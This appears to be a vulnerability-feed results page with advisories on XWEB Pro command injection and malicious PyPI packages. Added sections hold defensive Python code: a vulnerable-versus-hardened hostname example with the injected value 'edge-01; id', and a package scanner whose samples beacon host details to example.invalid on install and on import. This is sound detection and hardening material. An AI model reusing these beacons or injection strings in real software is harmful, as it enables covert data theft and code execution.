7921 matches found
CVE-2026-25037 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior. An authenticated attacker can configure a maliciously crafted LCD state which is later processed during system setup, resulting in remote code execution on the system...
CVE-2026-20764
CVE-2026-20764 affects Copeland XWEB Pro (versions prior to 1.12.1). An authenticated user can supply malicious input through the device hostname configuration, which is processed during system setup, resulting in OS command injection and remote code execution. Red Hat security notes the same vul...
CVE-2026-20764 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior. An authenticated attacker can provide malicious input via the device hostname configuration, which is later processed during system setup, resulting in remote...
CVE-2026-25109 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior. An authenticated attacker can inject malicious input into the devices field when accessing the get setup route, resulting in remote code execution on the system...
CVE-2026-25109
CVE-2026-25109 affects XWEB Pro prior to 1.12.1. The vulnerability is an OS command injection in the devices field on the /get setup route, exploitable by an authenticated attacker to achieve remote code execution. Public sources (NVD, Red Hat, EUVD) confirm the impact and vulnerable version rang...
PT-2026-22260
Name of the Vulnerable Software and Affected Versions XWEB Pro versions prior to 1.12.1 Description A flaw exists that allows a logged-in attacker to execute code remotely on a system. This is possible by injecting malicious input into the devices field when accessing the /get setup API endpoint...
PT-2026-22279
Name of the Vulnerable Software and Affected Versions XWEB Pro versions 1.12.1 and earlier Description A flaw exists that allows a logged-in attacker to execute code remotely on the system. This is achieved by supplying malicious input in the URL of the MBird SMS service and/or code through the...
PT-2026-22275
Name of the Vulnerable Software and Affected Versions XWEB Pro versions prior to 1.12.1 Description A flaw exists that allows a logged-in attacker to execute code on the system remotely. This is achieved by configuring a specially crafted LCD state, which is then processed during system setup. Th...
PT-2026-22270
Name of the Vulnerable Software and Affected Versions XWEB Pro versions prior to 1.12.1 Description An OS command injection issue exists, allowing an authenticated attacker to execute code remotely. This is achieved by providing malicious input through the device hostname configuration during...
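The four XWEB Pro entries above share one shape: a value an authenticated user is allowed to store (hostname, LCD state, a devices field) is consumed later by a privileged system-setup routine that hands it to a shell. The following is an added, generic illustration of that vulnerability class and of the fix a reviewer would ask for; it is not XWEB code, and every function name, the command strings and the sample hostnames are assumptions made for this example. The first builder interpolates the stored value into a shell command string; the second validates the value as a hostname and passes it as a single argv element with no shell in the path.

```python
"""Generic illustration (not XWEB code) of OS command injection through a
stored configuration value that a setup routine later feeds to a shell,
alongside a hardened version. All names and commands here are hypothetical."""
import re
import shlex
import subprocess

# RFC 1123 label: 1-63 chars of [A-Za-z0-9-], not starting or ending with '-'.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def build_setup_command_vulnerable(hostname: str) -> str:
    """Vulnerable pattern: the stored value is spliced into a command string
    that the setup routine runs through `sh -c` (shell=True). Any shell
    metacharacter in `hostname` is interpreted by the shell."""
    return f"hostname {hostname} && echo {hostname} > /etc/hostname"


def shell_commands(command: str) -> list[list[str]]:
    """Split a command string into the simple commands a POSIX shell would
    run, using shlex with punctuation_chars so ';', '&&', '||' and '|' come
    out as separate tokens. Only used to make the injection visible."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def validate_hostname(hostname: str) -> str:
    """Hardened input check: accept only a syntactically valid hostname
    (RFC 1123 labels, at most 253 characters overall), reject everything else."""
    if not hostname or len(hostname) > 253 or not _HOSTNAME_RE.match(hostname):
        raise ValueError(f"invalid hostname: {hostname!r}")
    return hostname


def build_setup_command_safe(hostname: str) -> list[str]:
    """Hardened pattern: validate, then return an argv list. Executed with
    shell=False the hostname is one argument and is never parsed by a shell."""
    return ["hostname", validate_hostname(hostname)]


def apply_hostname_safe(hostname: str, runner=subprocess.run) -> list[str]:
    """Apply the hardened command. `runner` is injectable so callers (and the
    test) can exercise the path without actually renaming the host."""
    argv = build_setup_command_safe(hostname)
    runner(argv, shell=False, check=True)
    return argv


if __name__ == "__main__":
    stored = "edge-01; id"  # constructed value an authenticated user could store
    print("vulnerable would run:", shell_commands(build_setup_command_vulnerable(stored)))
    try:
        build_setup_command_safe(stored)
    except ValueError as exc:
        print("hardened rejects:", exc)
```

Validation and argv passing are both needed: validation alone fails the day someone extends the allowed character set, and argv passing alone still lets a value reach whatever the invoked program does with it. The same treatment applies to the LCD-state and devices-field values in the other entries: anything an authenticated user can store and a setup routine later consumes is untrusted input at the point of consumption.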
Malicious code in edx-salesforce (PyPI)
Source: kam193 c4ffac16b09d8312b28d4f65cd3d0f49ecccca9de9d7bbdac0aed694b28949b7. Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. Category: PROBABLYPENTES...
Malicious code in awareness-demo-pkg (PyPI)
Source: kam193 73d2724a4dc0c9e8d1439a29324b142a46c456e7d078ba90127777a59bf906d8. Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. Category: PROBABLYPENTES...
MAL-2026-1035 Malicious code in neural-compressor-jax (PyPI)
Source: kam193 bb1f58a45ef1a06954d1807517faea8790a771906e95a98d571587558244ea3f. Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. Category: PROBABLYPENTES...
MAL-2026-1029 Malicious code in geocommunes-geoportal (PyPI)
Source: kam193 818beaf9a2c40fe1d288ab5f872c124eb851c191110b30d222a884e0cbec50b5. Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. Category: PROBABLYPENTES...
freerdp: FreeRDP heap-buffer-overflow
A heap-based buffer overflow has been discovered in FreeRDP. In affected versions the URBDRC client does not perform bounds checking on server-supplied MSUSB_INTERFACE_DESCRIPTOR values and uses them as indices in libusb_udev_complete_msconfig_setup, causing an out-of-bounds read...
DEBIAN-CVE-2026-26103
A flaw was found in the udisks storage management daemon that exposes a privileged D-Bus API for restoring LUKS encryption headers without proper authorization checks. The issue allows a local unprivileged user to instruct the root-owned udisks daemon to overwrite encryption metadata on block...
Malicious code in spark-audit-notify (PyPI)
Source: kam193 1c527925d1e7cb4055b6c154326cd54a713ad543349c2b3b6f8ab8f0d75e8cbe. During installation, host identification details including AD domain are exfiltrated through a series of functions obfuscating this behavior. Category:...
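The five kam193 entries on this page (edx-salesforce, awareness-demo-pkg, neural-compressor-jax, geocommunes-geoportal, spark-audit-notify) describe the same behaviour: host details are collected and sent out either when the package is installed or when its module is first imported. The following is an added example of the static triage a reviewer can run over an unpacked sdist before installing it; it is not code from those reports or from any of the named packages, and the three sample sources it scans are constructed for this example (the `example.invalid` host is a reserved name, not a real collector). It parses `setup.py` or a package `__init__.py` with `ast` and reports the combination that matters: an outbound-network call reachable from a setuptools command hook or from module top level, next to imports of host-fingerprinting modules.

```python
"""Static triage of a Python distribution for the install-time / import-time
host-information exfiltration pattern. Added example, not code from the
kam193 reports or any named package; sample sources below are constructed."""
import ast
from dataclasses import dataclass, field

# Module roots worth flagging: host fingerprinting on one side, egress on the other.
FINGERPRINT_MODULES = {"socket", "platform", "getpass", "uuid", "os"}
NETWORK_MODULES = {"urllib", "requests", "http", "httpx", "smtplib"}
# setuptools command classes that execute during `pip install`.
SETUPTOOLS_HOOKS = {"install", "develop", "egg_info", "build_py", "bdist_egg"}


@dataclass
class Finding:
    kind: str
    detail: str
    lineno: int


@dataclass
class TriageReport:
    findings: list = field(default_factory=list)

    def kinds(self) -> set:
        return {f.kind for f in self.findings}

    def is_suspicious(self) -> bool:
        """Egress plus something that fires on install or on import."""
        k = self.kinds()
        return "network_call" in k and bool(k & {"install_hook", "import_time_call"})


def _dotted(node: ast.AST) -> str:
    """'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def triage_source(source: str, filename: str = "setup.py") -> TriageReport:
    report = TriageReport()
    tree = ast.parse(source, filename)
    net_aliases = set()  # local names bound to a network module or its functions

    # Pass 1: imports. Learn which local names reach a network module.
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                root = a.name.split(".")[0]
                if root in NETWORK_MODULES:
                    net_aliases.add((a.asname or a.name).split(".")[0])
                    report.findings.append(Finding("network_import", a.name, node.lineno))
                if root in FINGERPRINT_MODULES:
                    report.findings.append(Finding("fingerprint_import", a.name, node.lineno))
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if root in NETWORK_MODULES:
                net_aliases.update(a.asname or a.name for a in node.names)
                report.findings.append(Finding("network_import", node.module, node.lineno))
            if root in FINGERPRINT_MODULES:
                report.findings.append(Finding("fingerprint_import", node.module, node.lineno))

    # Pass 2: setuptools hooks, cmdclass wiring, and calls into network aliases.
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            hooks = {_dotted(b).split(".")[-1] for b in node.bases} & SETUPTOOLS_HOOKS
            if hooks:
                report.findings.append(Finding("install_hook", f"{node.name} subclasses {sorted(hooks)}", node.lineno))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name.split(".")[0] in net_aliases:
                report.findings.append(Finding("network_call", name, node.lineno))
            if name.split(".")[-1] == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        report.findings.append(Finding("cmdclass", ast.unparse(kw.value), node.lineno))

    # Pass 3: network calls at module top level run on import, with no hook needed.
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call) and _dotted(node.func).split(".")[0] in net_aliases:
                report.findings.append(Finding("import_time_call", _dotted(node.func), node.lineno))
    return report


# Constructed samples: an install-hook beacon, an import-time beacon, and a benign setup.py.
SAMPLE_SETUP_PY = '''
import socket, getpass, platform
from urllib.request import urlopen, Request
from setuptools import setup
from setuptools.command.install import install

def _beacon():
    data = "|".join([socket.gethostname(), getpass.getuser(), platform.platform()])
    urlopen(Request("http://example.invalid/collect", data=data.encode()))

class PostInstall(install):
    def run(self):
        install.run(self)
        _beacon()

setup(name="totally-legit-helper", version="0.0.1", cmdclass={"install": PostInstall})
'''
SAMPLE_INIT_PY = '''
import platform, urllib.request
urllib.request.urlopen("http://example.invalid/i?" + platform.node())
'''
SAMPLE_BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="plain-lib", version="1.0", packages=["plain_lib"])
'''
```

This is a triage filter, not a verdict: a legitimate package can subclass `install` and an obfuscated one can reach the network through `__import__` or `ctypes` without any flagged name appearing, which is exactly the "series of functions obfuscating this behavior" the spark-audit-notify entry mentions. Use a report like this to decide what to unpack and read by hand, and run it over every `.py` in the sdist, not only `setup.py`.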